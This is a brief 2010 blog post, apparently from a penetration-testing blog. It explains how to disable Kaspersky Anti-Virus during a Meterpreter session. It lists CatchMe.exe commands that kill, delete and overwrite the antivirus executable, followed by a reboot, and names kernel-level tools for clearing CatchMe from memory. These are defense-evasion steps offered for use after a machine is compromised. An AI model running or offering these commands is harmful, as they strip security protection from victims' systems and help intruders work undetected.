Monday, April 26, 2010

Disabling Kaspersky via CatchMe.exe

Kaspersky Anti-Virus is a pain such that Meterpreter cannot disable it via the command "killav". Administrative privs still does not give you enough permissions because the Anti Virus nests itself into the kernel.


The following is destructive, read more about CatchMe before issuing the commands:

catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" [file]
reboot

or

attempt to remove catchme.exe from memory with: Darkspy, Seem, Icesword GUI

Above information found here in a nice Meterpreter cheatsheet:





Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)